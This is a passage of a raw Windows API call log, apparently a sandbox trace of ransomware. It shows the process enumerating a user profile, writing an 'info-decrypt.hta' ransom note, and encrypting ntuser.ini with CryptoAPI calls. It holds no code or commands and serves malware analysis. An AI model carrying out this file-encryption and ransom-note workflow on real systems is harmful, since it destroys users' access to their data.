cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0141.781] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0141.781] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0141.782] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0141.782] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0141.782] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0141.782] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe062ee20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe062ee20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0141.782] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0141.783] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0141.783] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0141.783] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0141.783] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0141.783] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0141.783] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0141.784] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe04d81c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe04d81c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0141.784] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0141.784] FindClose (in: hFindFile=0xb7f210 | out: hFindFile=0xb7f210) returned 1 [0141.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ed7c) returned 1 [0141.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ed88) returned 1 [0141.784] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x949e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpFilePart=0x0) returned 0x28 [0141.784] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0141.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec98) returned 1 [0141.784] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949ed14 | out: lpFileInformation=0x949ed14*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec94) returned 1 [0141.785] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x949e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpFilePart=0x0) returned 0x28 [0141.785] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e6d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0141.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebcc) returned 1 [0141.785] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4e0 [0141.785] GetFileType (hFile=0x4e0) returned 0x1 [0141.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebc8) returned 1 [0141.785] GetFileType (hFile=0x4e0) returned 0x1 [0141.786] WriteFile (in: hFile=0x4e0, lpBuffer=0x361ca0c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949ec90, lpOverlapped=0x0 | out: lpBuffer=0x361ca0c*, lpNumberOfBytesWritten=0x949ec90*=0x1000, lpOverlapped=0x0) returned 1 [0141.786] WriteFile (in: hFile=0x4e0, lpBuffer=0x361ca0c*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949ec64, lpOverlapped=0x0 | out: lpBuffer=0x361ca0c*, lpNumberOfBytesWritten=0x949ec64*=0x55e, lpOverlapped=0x0) returned 1 [0141.786] CloseHandle (hObject=0x4e0) returned 1 [0141.786] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x949e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpFilePart=0x0) returned 0x28 [0141.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ece4) returned 1 [0141.787] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), fInfoLevelId=0x0, lpFileInformation=0x361da28 | out: lpFileInformation=0x361da28*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0141.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ece0) returned 1 [0141.787] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x949e724, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpFilePart=0x0) returned 0x28 [0141.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec18) returned 1 [0141.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0141.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949da50) returned 1 [0141.788] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", nBufferLength=0x105, lpBuffer=0x949e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFilePart=0x0) returned 0x28 [0141.788] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0141.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec98) returned 1 [0141.788] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949ed14 | out: lpFileInformation=0x949ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12bf2480, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x12bf2480, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12bf2480, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0141.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec94) returned 1 [0141.789] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", nBufferLength=0x105, lpBuffer=0x949e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFilePart=0x0) returned 0x28 [0141.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ece4) returned 1 [0141.789] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), fInfoLevelId=0x0, lpFileInformation=0x361e604 | out: lpFileInformation=0x361e604*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14)) returned 1 [0141.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ece0) returned 1 [0141.789] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", nBufferLength=0x105, lpBuffer=0x949e724, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFilePart=0x0) returned 0x28 [0141.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec18) returned 1 [0141.789] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0141.789] GetFileType (hFile=0x4e0) returned 0x1 [0141.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec14) returned 1 [0141.790] GetFileType (hFile=0x4e0) returned 0x1 [0141.790] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x949ed20 | out: lpFileSizeHigh=0x949ed20*=0x0) returned 0x14 [0141.790] ReadFile (in: hFile=0x4e0, lpBuffer=0x361e7bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949eccc, lpOverlapped=0x0 | out: lpBuffer=0x361e7bc*, lpNumberOfBytesRead=0x949eccc*=0x14, lpOverlapped=0x0) returned 1 [0141.790] CloseHandle (hObject=0x4e0) returned 1 [0141.790] CryptAcquireContextW (in: phProv=0x949ec6c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ec6c*=0xb1dc08) returned 1 [0141.791] CryptGenRandom (in: hProv=0xb1dc08, dwLen=0x10, pbBuffer=0x361fb10 | out: pbBuffer=0x361fb10) returned 1 [0145.097] CryptImportKey (in: hProv=0xb1dc08, pbData=0x3620904, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ec3c | out: phKey=0x949ec3c*=0xb7f1d0) returned 1 [0145.097] CryptContextAddRef (hProv=0xb1dc08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.097] CryptContextAddRef (hProv=0xb1dc08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.097] CryptDuplicateKey (in: hKey=0xb7f1d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x949ec2c | out: phKey=0x949ec2c*=0xb7f0d0) returned 1 [0145.097] CryptContextAddRef (hProv=0xb1dc08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.097] CryptSetKeyParam (hKey=0xb7f0d0, dwParam=0x4, pbData=0x36209e4*=0x1, dwFlags=0x0) returned 1 [0145.097] CryptSetKeyParam (hKey=0xb7f0d0, dwParam=0x1, pbData=0x36209b0, dwFlags=0x0) returned 1 [0145.097] CryptEncrypt (in: hKey=0xb7f0d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36209f4*, pdwDataLen=0x949ec98*=0x20, dwBufLen=0x20 | out: pbData=0x36209f4*, pdwDataLen=0x949ec98*=0x20) returned 1 [0145.097] CryptEncrypt (in: hKey=0xb7f0d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3620a38*, pdwDataLen=0x949eca0*=0x0, dwBufLen=0x10 | out: pbData=0x3620a38*, pdwDataLen=0x949eca0*=0x10) returned 1 [0145.099] CryptDestroyKey (hKey=0xb7f1d0) returned 1 [0145.099] CryptReleaseContext (hProv=0xb1dc08, dwFlags=0x0) returned 1 [0145.099] CryptReleaseContext (hProv=0xb1dc08, dwFlags=0x0) returned 1 [0145.099] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", nBufferLength=0x105, lpBuffer=0x949e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFilePart=0x0) returned 0x28 [0145.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec04) returned 1 [0145.099] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0145.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949da40) returned 1 [0145.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ed6c) returned 1 [0145.101] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0x949e874, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0145.101] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", nBufferLength=0x105, lpBuffer=0x949e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpFilePart=0x0) returned 0x26 [0145.101] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x949ea94 | out: lpFindFileData=0x949ea94*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f1d0 [0145.101] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949eaa4 | out: lpFindFileData=0x949eaa4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.101] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949eaa4 | out: lpFindFileData=0x949eaa4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0145.101] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949eaa4 | out: lpFindFileData=0x949eaa4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0145.102] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949eaa4 | out: lpFindFileData=0x949eaa4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe06a1240, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe06a1240, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0145.102] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949eaa4 | out: lpFindFileData=0x949eaa4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe06a1240, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe06a1240, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0145.102] FindClose (in: hFindFile=0xb7f1d0 | out: hFindFile=0xb7f1d0) returned 1 [0145.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ed2c) returned 1 [0145.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ed38) returned 1 [0145.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ed6c) returned 1 [0145.102] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0x949e874, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0145.102] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", nBufferLength=0x105, lpBuffer=0x949e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpFilePart=0x0) returned 0x26 [0145.102] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x949ea94 | out: lpFindFileData=0x949ea94*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f1d0 [0145.103] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949eaa4 | out: lpFindFileData=0x949eaa4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 